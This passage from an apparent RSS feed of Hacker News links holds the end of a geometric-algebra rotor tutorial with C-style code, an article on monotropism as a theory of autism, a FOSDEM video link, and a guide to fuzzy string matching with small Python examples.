(s_{12}t_{23}\v{e_{12}}\v{e_{23}}) + (s_{12}t_{31}\v{e_{12}}\v{e_{31}}) \\ &+ (s_{23}t_0\v{e_{23}}) + (s_{23}t_{12}\v{e_{23}}\v{e_{12}}) + (s_{23}t_{23}\v{e_{23}}\v{e_{23}}) + (s_{23}t_{31}\v{e_{23}}\v{e_{31}}) \\ &+ (s_{31}t_0\v{e_{31}}) + (s_{31}t_{12}\v{e_{31}}\v{e_{12}}) + (s_{31}t_{23}\v{e_{31}}\v{e_{23}}) + (s_{31}t_{31}\v{e_{31}}\v{e_{31}}) \\ \v{ST} &= s_0 t_0 + s_0 t_{12}\v{e_{12}} + s_0 t_{23}\v{e_{23}} + s_0 t_{31}\v{e_{31}} \\ &+ s_{12}t_0\v{e_{12}} - s_{12}t_{12} - s_{12}t_{23}\v{e_{31}} + s_{12}t_{31}\v{e_{23}} \\ &+ s_{23}t_0\v{e_{23}} + s_{23}t_{12}\v{e_{31}} - s_{23}t_{23} - s_{23}t_{31}\v{e_{12}} \\ &+ s_{31}t_0\v{e_{31}} - s_{31}t_{12}\v{e_{23}} + s_{31}t_{23}\v{e_{12}} - s_{31}t_{31} \\ \v{ST} &= (s_0 t_0 - s_{12}t_{12} - s_{23}t_{23} - s_{31}t_{31}) \\ &+ (s_0 t_{12} + s_{12}t_0 - s_{23}t_{31} + s_{31}t_{23})\v{e_{12}} \\ &+ (s_0 t_{23} + s_{12}t_{31} + s_{23}t_0 - s_{31}t_{12})\v{e_{23}} \\ &+ (s_0 t_{31} - s_{12}t_{23} + s_{23}t_{12} + s_{31}t_0)\v{e_{31}} \\ \end{aligned}\]

So clearly \(\v{ST}\) has only scalar and bivector components, and we can use the product as a new rotor.

This multiplication also translates fairly directly into code:

// Note the order: combine(lhs, rhs) computes the geometric product lhs*rhs,
// i.e. the combined rotor applies rhs first and then lhs.
rotor3 combine(rotor3 lhs, rotor3 rhs)
{
    rotor3 result = {};
    result.scalar = lhs.scalar*rhs.scalar - lhs.xy*rhs.xy - lhs.yz*rhs.yz - lhs.zx*rhs.zx;
    result.xy = lhs.scalar*rhs.xy + lhs.xy*rhs.scalar - lhs.yz*rhs.zx + lhs.zx*rhs.yz;
    result.yz = lhs.scalar*rhs.yz + lhs.xy*rhs.zx + lhs.yz*rhs.scalar - lhs.zx*rhs.xy;
    result.zx = lhs.scalar*rhs.zx - lhs.xy*rhs.yz + lhs.yz*rhs.xy + lhs.zx*rhs.scalar;
    return result;
}

How do I invert or reverse a rotor to produce the same rotation in the opposite direction?

Since the rotor produced by the geometric product of vectors \(\v{ba}\) is a rotation in the plane formed by those two vectors, by twice the angle between those vectors (in the direction from a to b), we can produce a rotation in the same plane by the same angle in the opposite direction by just swapping \(\v{a}\) and \(\v{b}\) to get: \(\v{R}^\prime = \v{ab} = \v{a \cdot b + a \wedge b} = \v{b \cdot a - b \wedge a}\) which we can produce with very little computation from \(\v{R}\) by just negating the bivector components:

rotor3 reverse(rotor3 r)
{
    rotor3 result = {};
    result.scalar = r.scalar;
    result.xy = -r.xy;
    result.yz = -r.yz;
    result.zx = -r.zx;
    return result;
}

Given a particular rotor, how do I actually apply it to a vector directly?

Earlier when we showed how to apply a rotor, we did it in two steps as two separate reflection calculations. While mathematically equivalent, this requires that we store the vectors that make up our rotor (rather than just the scalar & bivector components) and requires us to do far more arithmetic. Instead we’ll sandwich the input vector directly with the entire, pre-computed rotor:

Direct rotor sandwich

Let \(\v{R} = r_0 + r_{12}\v{e_{12}} + r_{23}\v{e_{23}} + r_{31}\v{e_{31}}\) and \(\v{v} = v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}\).

Now \(\v{R = ba}\), for vectors \(\v{a}\) and \(\v{b}\), so by equation 5 we have that \(\v{R^{-1} = (ba)^{-1} = a^{-1}b^{-1}}\) and equation 4 gives us \(\v{R^{-1}} = \frac{1}{|a|^2|b|^2}\v{ab}\).

Our full sandwich product is therefore:

\[ \v{v^\prime} = \v{RvR}^{-1} = \v{(ba)v}\left(\frac{1}{|a|^2|b|^2}\v{ab}\right) = \frac{1}{|a|^2|b|^2}\v{(ba)v(ab)} \]

To keep our equations a little shorter, let’s start by just computing the first product \(\v{S = Rv}\):

\[\begin{align*} \v{S} =~& \v{Rv} = \v{(ba)v} \\ =~& (r_0 + r_{12}\v{e_{12}} + r_{23}\v{e_{23}} + r_{31}\v{e_{31}})(v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}) \\ =~& r_0(v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}) \\ & + r_{12}\v{e_{12}}(v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}) \\ & + r_{23}\v{e_{23}}(v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}) \\ & + r_{31}\v{e_{31}}(v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}) \\ =~& r_0v_1\v{e_1} + r_0v_2\v{e_2} + r_0v_3\v{e_3} \\ & + r_{12}v_1\v{e_{12}}\v{e_1} + r_{12}v_2\v{e_{12}}\v{e_2} + r_{12}v_3\v{e_{12}}\v{e_3} \\ & + r_{23}v_1\v{e_{23}}\v{e_1} + r_{23}v_2\v{e_{23}}\v{e_2} + r_{23}v_3\v{e_{23}}\v{e_3} \\ & + r_{31}v_1\v{e_{31}}\v{e_1} + r_{31}v_2\v{e_{31}}\v{e_2} + r_{31}v_3\v{e_{31}}\v{e_3} \\ =~& r_0v_1\v{e_1} + r_0v_2\v{e_2} + r_0v_3\v{e_3} \\ & - r_{12}v_1\v{e_2} + r_{12}v_2\v{e_1} + r_{12}v_3\v{e_{123}} \\ & + r_{23}v_1\v{e_{123}} - r_{23}v_2\v{e_3} + r_{23}v_3\v{e_2} \\ & + r_{31}v_1\v{e_3} + r_{31}v_2\v{e_{123}} - r_{31}v_3\v{e_1} \\ =~& (r_0v_1 + r_{12}v_2 - r_{31}v_3)\v{e_1} \\ & + (r_0v_2 - r_{12}v_1 + r_{23}v_3)\v{e_2} \\ & + (r_0v_3 - r_{23}v_2 + r_{31}v_1)\v{e_3} \\ & + (r_{12}v_3 + r_{23}v_1 + r_{31}v_2)\v{e_{123}} \\ \end{align*}\]

To compute the final product we’ll write our calculations in terms of \(\v{S}\) rather than in terms of \(\v{R}\) and \(\v{v}\). This makes the equations shorter and also translates more easily into code.

Before we can do that though, we need a value for \(\v{ab}\). Since we already have \(\v{ba}\) in our original definition of \(\v{R}\), we can save ourselves having to compute \(\v{ab}\) by realising that its dot product term is commutative while its wedge product term is anti-commutative (equation 2), so we can produce one from the other just by negating the bivector component:

\[\v{ab} = r_0 - r_{12}\v{e_{12}} - r_{23}\v{e_{23}} - r_{31}\v{e_{31}}\]

Now we can complete the calculation:

\[\begin{align*} \v{v^\prime} =~& \v{(ba)v}\left(\frac{1}{|a|^2|b|^2}\v{ab}\right) = \frac{1}{|a|^2|b|^2}\v{S(ab)} \\ =~& \frac{1}{|a|^2|b|^2} [ \\ & s_1\v{e_1}(r_0 - r_{12}\v{e_{12}} - r_{23}\v{e_{23}} - r_{31}\v{e_{31}}) \\ & + s_2\v{e_2}(r_0 - r_{12}\v{e_{12}} - r_{23}\v{e_{23}} - r_{31}\v{e_{31}}) \\ & + s_3\v{e_3}(r_0 - r_{12}\v{e_{12}} - r_{23}\v{e_{23}} - r_{31}\v{e_{31}}) \\ & + s_{123}\v{e_{123}}(r_0 - r_{12}\v{e_{12}} - r_{23}\v{e_{23}} - r_{31}\v{e_{31}}) \\ & ] \\ =~& \frac{1}{|a|^2|b|^2} [ \tag{multiply out} \\ & s_1r_0\v{e_1} - s_1r_{12}\v{e_1}\v{e_{12}} - s_1r_{23}\v{e_1}\v{e_{23}} - s_1r_{31}\v{e_1}\v{e_{31}} \\ & + s_2r_0\v{e_2} - …
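
Carrying the same pattern through to the end (a sketch of mine rather than the article's own code, since the feed cuts the derivation off here; it assumes a unit rotor so that the \(\frac{1}{|a|^2|b|^2}\) factor is 1, and it reproduces the 60-degree axis-angle example from earlier):

// Apply a unit rotor to a vector: v' = R v R^-1
vec3 rotate(rotor3 r, vec3 v)
{
    // S = Rv: a vector part (s1, s2, s3) plus a trivector part s123
    const float s1   = r.scalar*v.x + r.xy*v.y - r.zx*v.z;
    const float s2   = r.scalar*v.y - r.xy*v.x + r.yz*v.z;
    const float s3   = r.scalar*v.z - r.yz*v.y + r.zx*v.x;
    const float s123 = r.xy*v.z + r.yz*v.x + r.zx*v.y;

    // v' = S(ab), where ab is R with its bivector components negated;
    // the trivector coefficient of the result cancels to zero.
    vec3 result;
    result.x = s1*r.scalar + s2*r.xy - s3*r.zx + s123*r.yz;
    result.y = s2*r.scalar - s1*r.xy + s3*r.yz + s123*r.zx;
    result.z = s3*r.scalar + s1*r.zx - s2*r.yz + s123*r.xy;
    return result;
}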


Article truncated for RSS feed. Read the full article at https://jacquesheunis.com/post/rotors/

]]>
https://jacquesheunis.com/post/rotors/ hacker-news-small-sites-43234510 Sun, 02 Mar 2025 20:10:55 GMT
<![CDATA[Me and Monotropism: A unified theory of autism (2018)]]> thread link) | @yamrzou
March 2, 2025 | https://www.bps.org.uk/psychologist/me-and-monotropism-unified-theory-autism | archive.org

Autism is still widely seen as mysterious  –  so much so that the most widely recognised symbol of it (unpopular in the autistic community) is a puzzle piece. Various psychological theories of autism haven't helped all that much, largely because all of the most established ones leave vast swathes of autistic experience completely untouched, and tend to leave people with harmful misconceptions. The one theory I think comes anywhere close to explaining the whole shebang  –  monotropism  –  has been largely overlooked by psychologists. 

This rankles with me as an autistic adult, as a science teacher and (full disclosure) as the offspring of the theory's originator, Dinah Murray. As someone on the spectrum myself, I dislike the pathologising, deficit-based framing of the best-known theories of autism, and I hate the mistakes they lead to in practice: assuming we lack empathy and have no idea what's going on in anyone else's head; painting autistic cognition as inherently more 'male'; expecting skills we're slow to pick up as kids to be lacking throughout our lives.

It bothers me as a science teacher, almost as much as it troubles me as an autist, that psychologists settled for theories of autism which simply fail to provide any explanation for so much of autistic thinking. Granted, my background is in physics and philosophy rather than psychology, but I've always understood that when your theory only partially explains the phenomena being examined, you should keep looking for a better theory. When there are persistent threads left unexplained  – such as the sensory differences so common among autistic people  –  you really need a more complete framework. Partial theories can be useful, but it's all too easy to stretch them beyond their domain of applicability, and it can cause real problems, like assuming autistic adults have no theory of mind. Maybe it's my autistic perfectionism, but I don't like theories to leave too many loose ends.

Monotropism provides a far more comprehensive explanation for autistic cognition than any of its competitors, so it has been good to see it finally starting to get more recognition among psychologists (as in Sue Fletcher-Watson's keynote talk at the 2018 Autistica conference). In a nutshell, monotropism is the tendency for our interests to pull us in more strongly than most people. It rests on a model of the mind as an 'interest system': we are all interested in many things, and our interests help direct our attention. Different interests are salient at different times. In a monotropic mind, fewer interests tend to be aroused at any time, and they attract more of our processing resources, making it harder to deal with things outside of our current attention tunnel.

The classic paper on this, 'Attention, Monotropism and the Diagnostic Criteria for Autism' largely focuses on how the theory provides convincing accounts of all the features of autism listed in diagnostic manuals, and ties them together in a way other theories fail to. The authors do a persuasive job of this, but I find the diagnostic criteria so lacking when it comes to accounting for the experience of autism that I'm not going to use that framing. Instead I will focus on some key features of autism as seen from the inside: autistic inertia; sensory differences; social differences; and focused interests. I close with some thoughts on implications for practice, the role of developmental perspectives, and potential research directions.

Autistic inertia

The bulk of what's usually referred to as 'executive dysfunction' in autism – difficulties getting going with things, executing plans, and tearing ourselves away from things once we've started – is more informatively talked about as 'autistic inertia'. That is, resistance to a change in state: difficulty starting, stopping or changing direction. This is central to many of the difficulties autistic people face in life, but it is also part of what makes autistic thinking distinctive and valuable.

I'm a little uncomfortable with 'executive dysfunction' as a label for this, because it makes it seem like it's a problem with steering; it's more helpful to think about momentum of thought carrying us forward, often to conclusions that others might have missed. Thinking in terms of inertia also gives some insight into the discomfort of being interrupted, or plans changing. It's as if we've loaded a cart to the brim with thoughts and feelings, and then we suddenly have to steer it round a sharp corner.

This tendency follows naturally from monotropism. Whatever interest is most aroused in a monotropic mind tends to pull in a whole load of processing resources. That naturally makes it harder to change track, especially when you understand that the paths of our thoughts always leave an imprint in our minds, and autistic ones leave deeper grooves than they might in the average mind.

Sensory differences

It is easier for autistic people to process one channel at a time. Distributing our attention between multiple streams takes effort, and sometimes just doesn't work at all. Again, monotropism is characterised by intensity wherever our focus is, at the cost of processing resources that might otherwise be used to deal with other input or interests. This is often a problem in social situations. Autism is occasionally mistaken for deafness, especially in small children: if our attention is elsewhere, auditory input might register as an unwelcome interruption we would much rather ignore, or it might not register at all.

Conversely, if we can't tune an input out, it is often experienced as horribly intrusive. I think this is from a combination of discomfort at our attention being constantly pulled away from where we want it to be, with the tendency to feel something strongly if it's present in our awareness at all. Our brains throw a lot of resources at whatever our focus is on, which accounts for both the intensity of conscious awareness and the pain of distracting stimuli we can't filter out. There is likely a developmental aspect to this: neural pathways that receive a lot of stimulation grow stronger, so perhaps autistic people are prone to long-term hyper-sensitivity in senses receiving intense attention, and under-sensitivity in channels we regularly tune out.

Often, if we get overloaded, it helps to have controlled or predictable input. Stimming, flapping, rocking and humming provide something we can do and feel without having to think about it, and can make it much easier to filter, to focus on something else, or to deal with feelings of overwhelm.

Social differences

Many social differences are sensory differences at root. Being unable to process multiple channels of input most of the time makes the combination of spoken words, body language and eye contact tremendously challenging. Add autistic inertia to the mix, and we can also see why autistic people often need more processing time and can find the back-and-forth of neurotypical conversation difficult to keep up with.

Monotropic processing also explains the literal-mindedness that autistic people are notorious for. Polytropic minds have multiple interests aroused at any time, pulling in multiple strands of information, both external and internal. They are primed to be on the look-out for things like social implications, and effortlessly decode metaphors and indirect language. The monotropic mind tends to expect one thing to follow from another more directly than that. Most autistic people get the hang of metaphors eventually, but many still report the literal meaning of a saying tends to come to mind first, and it takes a moment's processing to substitute the metaphorical intent.

Autistic focus tends to mean we miss a lot of things that other people register, but other people probably miss just as many things  – just different things. Psychologists like Peter Vermeulen talk about 'context-blindness': a useful concept, but we all construct our own contexts all the time, and a better way of thinking about this is probably as 'a mismatch of salience', to borrow the title of Damian Milton's essay collection. I might miss your context, but don't assume you understand mine without checking.

A lot of processing power goes into modelling other minds, something that can seem effortless but is never trivial. It becomes much harder when the minds in question are very different from your own. When autistic people fail to do this, it's not so much that we're unable  – the idea of 'mind-blindness' is deeply misleading  –  but that we don't always have the processing power left over to do it effectively, when our attention is being pulled strongly in another direction.

Focused interests

Interests are at the heart of the monotropism account, and have been present in characterisations of autism right from the start. Their near-absence from the more established theories of autism, and indeed the entire psychological literature on autism, is glaring. The diagnostic criteria talk about 'restricted' and 'repetitive' interests, but the main characteristic feature of autistic 'special interests' is really how much we focus on them (or they focus us), not how restricted or repetitive they are.

Everyone's passions are repetitive; that's just in the nature of strong interests. When people talk about 'restricted interests' what they mostly seem to mean is that they can't fathom our failure to be interested in things that seem important to them. It is true that we're often powerfully interested in a few things for a relatively long time, but they do change over the years, and sometimes over much shorter time periods. For my part, I have many interests, some of them fascinations since childhood, most of them all-consuming when I get into them. Chatting with autistic adults about the things that interest them often makes the idea that their interests are 'restricted' seem preposterous.

What is true is that our interests pull us in very strongly and persistently, compared with most people. It can be hard to think about anything else when we're particularly invested in a topic, and hard to imagine how little other people might care about it. That can be a huge asset in many fields – intense focus is indispensable in science, maths, technology, music, art and philosophy, among others. Obviously autistic people are not the only ones capable of hyperfocus and persistent interests, but it is a common feature of the autistic psyche, and one that is too often squandered when workplaces and schools are not set up to allow it.

Implications for practice

The biggest practical thing to take away from this is the importance of meeting the child, or adult, where they are. This is not an insight unique to the monotropism perspective, but nothing else I've seen demonstrates with such clarity why it's so crucial. Treat interests as something to work with. Recognise what someone's passionate about and learn how to become part of the attention tunnels which come with monotropic focus, rather than trying to just reach in and pull the person out of the flow states that are so important to us. Never pathologise 'special interests', and don't assume that autistic interests are 'restricted'  – there are plenty of ways to get us interested in new things, it's just that they mostly involve taking existing interests and building on them.

Stability is a basic human need, and life as a monotropic person in a polytropic world is often unstable. It is deeply destabilising to be pulled out of an attention tunnel, to be regularly surprised by people's actions, or to feel you are not being understood. Much of autistic behaviour can be seen as attempts to restore some kind of equilibrium.

'Restricted, repetitive behaviours' are a natural response to feelings of instability. They allow you to assert control over what is happening, and feel safer. This is probably a useful general rule, not something that's only true in autism  –  we see restricted, repetitive behaviours in all sorts of contexts, it's mostly just that autistic people's ones stand out as particularly odd, to most people. 

Helping autistic people to maintain a sense of stability should be a priority for those around them. It's widely understood that routines can often help autistic people, but I'm not sure it's widely understood why. A lot of it is about minimising mental load: taking out things that we have to think about, so that we can maintain focus. Another big part of it is that changing plans involves such a mental shift that it's exhausting. The ability to feel in control is central to all of this, and externally imposed routines sometimes backfire for that reason. Frustrations and anxiety about control can manifest in demand avoidance, meltdowns and shutdowns at times.

The dynamically developing mind

No theory about minds is complete unless it's dynamic and developmental: we are all changing all the time, and big parts of what make autistic people different have to do with heading down different development paths. Whatever the cause, a failure to connect with the people around you, especially parents, is going to have long-term implications for a person and how they relate to those around them. Perhaps even bigger than that is the disorientation faced regularly by so many autistic children, coupled with wrenching dislocations as they are forced to change tracks again and again to suit other people's schedules. High levels of stress and anxiety have far-reaching effects on a person's long term mental and physical health, and it can be difficult to disentangle some of these from the traits that follow directly from autistic ways of thinking. 

The developmental perspective is particularly crucial because we go on learning throughout our lives, and some of the things that are impossibly difficult when we are young get much easier over time once we start focusing on them and practising. This does not mean we stop being autistic  –  all signs are that a monotropic brain is for life  –  but it does mean that many of the traits which are considered telltale signs of autism in children are only sometimes seen in autistic adults.

Different experiences in youth and throughout life, and particularly the different choices we make about where to focus our attention, are likely to account for a good chunk of the diversity of ways that autism can present. Growing up in a household where eccentricity was embraced and hyperfocus understood probably helped me to grow into a relatively confident adult, and not an especially anxious one. Neither myself nor my mother grew up thinking of ourselves as autistic, but we were allowed to be weird, and that makes a big difference.

Part of the variation in autism is also likely to be due to different degrees of monotropism: it has been suggested that the trait might follow a normal distribution, with some people being very monotropic, while others (perhaps the world's natural multitaskers and people-wranglers) are unusually polytropic. However the trait is distributed, the implication is that some people are closer to having autistic minds than others without qualifying as autistic themselves, and some autistic people have more atypical minds than others in terms of monotropism. This doesn't make the spectrum linear: there are so many different ways for autism to manifest, and so many co-occurring conditions, that no one variable can come close to capturing them all.

Implications for research

If, as I've argued, monotropism provides a common underlying explanation for all the main features of autistic psychology, then autism is not nearly as mysterious as people tend to think. We do not need to rely on theories which explain only a few aspects of autistic cognition, with no convincing explanation for sensory hyper- and hypo-sensitivity, or the intensity of autistic interests.

Why then is monotropism not already better known, despite a flourishing of attention in recent years? I believe the reasons are more sociological than psychological. When 'Attention, Monotropism…' was published in 2005, none of the three authors were professional psychologists, although one has a PhD in psycholinguistics, and had worked extensively with people on the autistic spectrum; another, Wenn Lawson, received a PhD later for further work on this theory, with their thesis on 'Single Attention and Cognition in Autism' since turned into the book A Passionate Mind. Lawson had an official diagnosis of autism, which should be an asset for anyone working in autism, but is still seen by some to undermine credibility instead. The other two were undiagnosed.

None were enmeshed in the world of professional psychology, and despite Lawson's book pointing to several possible tests, they do not seem to have known which strings to pull to make sure psychologists conducted the empirical work needed to rigorously test monotropism. Autism deserves good, well-evidenced theories, and while it is easy to point out major flaws in autism theories that psychologists have largely accepted, it makes sense that they would be reluctant to accept a newer theory from relative outsiders, however much it explains. Sue Fletcher-Watson, a psychologist in the field, points out that 'often in psychology a new theory is built on top of an empirical finding — this is what happened certainly with Theory of Mind which was rooted in a 1985 experimental study by Simon Baron-Cohen, Alan Leslie and Uta Frith. For non-autistic psychologists, there is no lived experience of autism out of which to build a theoretical model and so experimental data have to come first. This could be another reason why autistic-led theories, drawn at least in part from internal observations, struggle to make a big impact in mainstream research.'

This could be about to change. More researchers in recent years have started listening seriously to autistic perspectives on our own experiences and the theories used to describe us, and this is undoubtedly part of the reason monotropism has been gaining more attention. As psychologists dig deeper into aspects of autistic experience they have tended to overlook, including perceptual processing and the nature of autistic interests, there is great appeal in a framework that ties together these seemingly disparate strands (while deepening explanations of things like executive function and social problems). Perhaps it can also provide some helpful hints for neuroscientists. Meanwhile, insight into the monotropic mind is already helpful for anyone living and working with autistic people; I would love to see more practice-based research, looking at the impact of being able to make better sense of autistic behaviour and perspectives.

My hope is that in a few years psychologists will look back at the fragmentary accounts they have been working with, and wonder why it all seemed such a puzzle for so long. But I'm not a psychologist, I'm just an autistic schoolteacher; perhaps you should take what I say with a grain of salt.

- Fergus Murray (aka Oolong) is a science teacher and writer based in Edinburgh; formally assessed as autistic in 2010, at the age of 32.

"My mum Dinah started thinking about the mind as an interest system when I was a kid, with her PhD on Language and Interests submitted when I was eight. A few years later she read about autism in Uta Frith's book Explaining the Enigma, and I remember her excitement as she started to realise her model could easily be modified to explain rather more of this enigma than Frith or anybody seemed to have managed up to then.

So I grew up knowing about monotropism, and we have discussed it extensively since. I always knew that my way of thinking tended that way, but it took years for either of us to fully identify with it. In many ways, our autism is atypical — we are not introverted, nor socially unskilled, and our interests are wide-ranging (if sometimes all-consuming). We fit the profile sometimes misleadingly labelled 'female autism' rather well, but this was even less understood then than it is now. It took spending a lot of time around autistic people to recognise that our easy understanding of their way of thinking came not just thanks to the valuable lens of monotropism, but also because it often resembled our own."

"The photos at the top are my own; I thought it could be good to have something that illustrates the idea of degrees of branching, and after spending a while looking at satellite images of gorges and deltas this is what I came up with."

This article was originally published online in November 2018

References

Beardon, L. (2017). Autism and Asperger Syndrome in Adults.

Chown, N. (2016). Understanding and evaluating autism theory. Jessica Kingsley Publishers.

Chown, N., & Beardon, L. (2017). Autism theory. In F. Volkmar (Ed.), Encyclopedia of Autism Spectrum Disorders. Springer, New York, NY.

Fletcher-Watson, S., Adams, J., Brook, K., Charman, T., Crane, L., Cusack, J., … & Pellicano, E. (2018). Making the future together: Shaping autism research through meaningful participation. Autism, 1362361318786721.

Lawson, W. (2011). The passionate mind: How individuals with autism learn. Jessica Kingsley Publishers.

McDonnell, A., & Milton, D. (2014). Going with the flow: reconsidering 'repetitive behaviour' through the concept of 'flow states'.

Milton, D. E. (2012). On the ontological status of autism: the 'double empathy problem'. Disability & Society, 27(6), 883–887.

Murray, D., Lesser, M., & Lawson, W. (2005). Attention, monotropism and the diagnostic criteria for autism. Autism, 9(2), 139–156.

Murray, D. (2018). Monotropism – An Interest Based Account of Autism. In F. Volkmar (Ed.), Encyclopedia of Autism Spectrum Disorders. Springer, New York, NY.

With thanks to Dinah Murray, Sonny Hallett, Richard Woods, Nick Chown, Niall Leighton, Damian Milton and Sue Fletcher-Watson for their help refining my thoughts.

]]>
https://www.bps.org.uk/psychologist/me-and-monotropism-unified-theory-autism hacker-news-small-sites-43234429 Sun, 02 Mar 2025 20:02:18 GMT
<![CDATA[Disrupting the destruction of our natural world with openness]]> thread link) | @protontypes
March 2, 2025 | https://mirror.as35701.net/video.fosdem.org/2025/h2215/fosdem-2025-5972-disrupting-the-destruction-of-our-natural-world-with-openness.av1.webm | archive.org

Article truncated for RSS feed. Read the full article at https://mirror.as35701.net/video.fosdem.org/2025/h2215/fosdem-2025-5972-disrupting-the-destruction-of-our-natural-world-with-openness.av1.webm

]]>
https://mirror.as35701.net/video.fosdem.org/2025/h2215/fosdem-2025-5972-disrupting-the-destruction-of-our-natural-world-with-openness.av1.webm hacker-news-small-sites-43234221 Sun, 02 Mar 2025 19:44:09 GMT
<![CDATA[A Concise Guide to Fuzzy Matching Algorithms and Some Practical Applications]]> thread link) | @ogora
March 2, 2025 | https://www.getflookup.com/documentation/fuzzy-matching-algorithms-explained | archive.org

Fuzzy matching is a technique for finding strings in one dataset that approximately, rather than exactly, match strings in a separate dataset. The discipline of fuzzy matching can typically be sub-divided into two problems:

  • Finding approximate substring matches inside any given text entry.

  • Finding dictionary text entries that approximately match a specific pattern.

Fuzzy matching is known by several names, including fuzzy string matching and approximate string matching. Most fuzzy matching algorithms return similarity scores as percentages to help users gauge how similar the compared text entries are, with a typical scale ranging from 0% for no similarity to 100% for an exact match.
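
To make the percentage scale concrete, here is a minimal sketch in Python that scores two strings on a 0-100 scale. It uses the standard library's difflib.SequenceMatcher as one example of a scorer; the function name similarity_percent is illustrative and is not tied to Flookup or any other product.

```python
# A minimal similarity scorer on the 0-100% scale described above.
# difflib.SequenceMatcher is one of many possible scoring backends.
from difflib import SequenceMatcher

def similarity_percent(a: str, b: str) -> float:
    """Return a 0-100 similarity score for two strings (case-insensitive)."""
    return SequenceMatcher(None, a.lower(), b.lower()).ratio() * 100

print(similarity_percent("Jon Smith", "John Smith"))  # high score: near-match
print(similarity_percent("Jon Smith", "Jane Doe"))    # low score: poor match
print(similarity_percent("Jon Smith", "JON SMITH"))   # 100.0: exact after casefolding
```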

Why Use Fuzzy Matching Software?

Data in the real world is often not stored in uniform formats due to the variety of methods used in data collection and processing. This diversity can lead to discrepancies in data entry, such as variations in spelling and formatting. However, these challenges can be significantly mitigated with the use of fuzzy matching software during the data cleaning process.

Fuzzy matching software can aid in identifying and rectifying text-based discrepancies within your datasets. This feature is especially beneficial when dealing with non-standardised data, reducing the number of manual data cleaning operations.

A well-designed fuzzy matching tool eliminates the need for costly and time-consuming tasks such as fresh coding or algorithm development. This allows business users and technical teams to focus their efforts on addressing data processing challenges, rather than being burdened with additional tasks. The use of such a tool not only improves efficiency but also optimises resource allocation.

What Can Fuzzy Matching Software Do?

  • Record linkage: Fuzzy matching software can link closely related records across multiple data sources. This creates a unified identity, providing a holistic view of each entity, be it a customer, product or any other subject of interest.

  • Data deduplication: This software can efficiently merge duplicate records within extensive datasets. This not only reduces redundancy but also improves the accuracy of data analysis and insights (a short deduplication sketch follows this list).

  • Spelling variation analysis: Fuzzy matching software is adept at detecting and correcting spelling errors, typos, or variations in customer data. This ensures precise search and analysis, enhancing the quality of customer interactions and engagements.

  • Data standardization: This software can link records with abbreviations or acronyms. For example, it can match "Limited" with "Ltd", ensuring a uniform format across the dataset. This standardisation facilitates easier data management and more accurate analytics.

  • Data integration: Fuzzy matching software can consolidate data from diverse sources into a single on-premises platform. This allows for straightforward data sanitation, ensuring that your data is clean, consistent, and ready for analysis.

  • Name variation matching: It can manage variations in names, titles, or prefixes. This ensures accurate customer profiling and personalised communication, enhancing customer experience and satisfaction.
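
To make the deduplication use case concrete, the sketch below flags pairs of records whose names score at or above an illustrative similarity threshold. The records and the 75% cutoff are made-up values, and difflib stands in for whatever matching engine you actually use.

```python
# A hypothetical fuzzy-deduplication pass: compare every pair of records
# and flag the ones scoring at or above an illustrative threshold.
from difflib import SequenceMatcher
from itertools import combinations

records = ["Acme Ltd", "ACME Limited", "Acme Ltd.", "Apex Holdings"]
THRESHOLD = 75.0  # illustrative; tune per dataset (see the next section)

def similarity_percent(a: str, b: str) -> float:
    return SequenceMatcher(None, a.lower(), b.lower()).ratio() * 100

for a, b in combinations(records, 2):
    score = similarity_percent(a, b)
    if score >= THRESHOLD:
        print(f"Possible duplicates ({score:.0f}%): {a!r} <-> {b!r}")
```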

Minimising the Impact of False Positives

  • Set a fuzzy match threshold: Establish a fuzzy match threshold for your particular dataset, a cutoff below which candidate pairs are not considered matches. Thresholds that are too low increase the likelihood of false positives, while thresholds that are too high increase the likelihood of false negatives.

  • Refine your lookup criteria: Do not just rely on one data point for matching. Consider including other factors like addresses and social security numbers for a more robust fuzzy matching operation (a multi-field sketch follows this list).

  • Expert review: Have a domain expert review the results of the match operation. An expert, with their in-depth knowledge of your data, can be instrumental in developing and fine-tuning the matching algorithm as well as in interpreting its output. For instance, if you are matching a school database, consulting someone who understands why certain information might be missing or unrecorded could be beneficial.

  • Quality over quantity: Make sure your main dataset is clean, comprehensive and current. Compromised datasets will always lead to corrupted match results.
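
As a sketch of combining lookup criteria, the example below weights a name score against an address score so that no single noisy field can create a false positive on its own. The field names, weights and 85% threshold are illustrative assumptions, not recommendations from any specific tool.

```python
# A hypothetical multi-field matcher: blend the name score with the
# address score instead of relying on one data point alone.
from difflib import SequenceMatcher

def sim(a: str, b: str) -> float:
    return SequenceMatcher(None, a.lower(), b.lower()).ratio() * 100

def combined_score(rec_a: dict, rec_b: dict) -> float:
    # Weights are illustrative; tune them for your own dataset.
    return (0.6 * sim(rec_a["name"], rec_b["name"])
            + 0.4 * sim(rec_a["address"], rec_b["address"]))

a = {"name": "Jon Smith",  "address": "12 High St, Leeds"}
b = {"name": "John Smith", "address": "12 High Street, Leeds"}

score = combined_score(a, b)
print(f"{score:.1f}% ->", "match" if score >= 85 else "no match")
```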

Fuzzy Matching in Action: A Real-World Example

Record linkage techniques can be used to detect fraud, resource wastage or abuse. In this story, two databases were merged and compared for inconsistencies, leading to a discovery that helped the U.S. government put a stop to fraudulent behaviour by some government employees:

In a period of 18 months leading up to the summer of 2005, a database comprising records of 40,000 pilots licensed by the U.S. Federal Aviation Administration and residing in Northern California was matched against a database of individuals receiving disability payments from the Social Security Administration, and it was discovered that the names of some pilots appeared in both databases.

In a report by the Associated Press, a prosecutor from the U.S. Attorney’s Office in Fresno, CA stated the following:

There was probably criminal wrongdoing. The pilots were either lying to the FAA or wrongfully receiving benefits. The pilots claimed to be medically fit to fly airplanes. However, they may have been flying with debilitating illnesses that should have kept them grounded, ranging from schizophrenia and bipolar disorder to drug and alcohol addiction and heart conditions.

In the end, at least 40 pilots were charged with the crimes of "making false statements to a government agency" and "making and delivering a false official writing". The FAA also suspended the licenses of 14 pilots, while others were put on notice pending further investigations.

Popular Fuzzy Matching Algorithms

    • Cosine Similarity: It is used to measure the similarity between two strings by representing them as vectors in an n-dimensional vector space. The cosine of the angle between these two vectors is calculated, with a score ranging from 0 to 1.

    • Levenshtein Distance: It calculates the minimum number of single-character edits required to transform one word into another. Valid edits are insertions, deletions or substitutions (a minimal implementation follows this list).

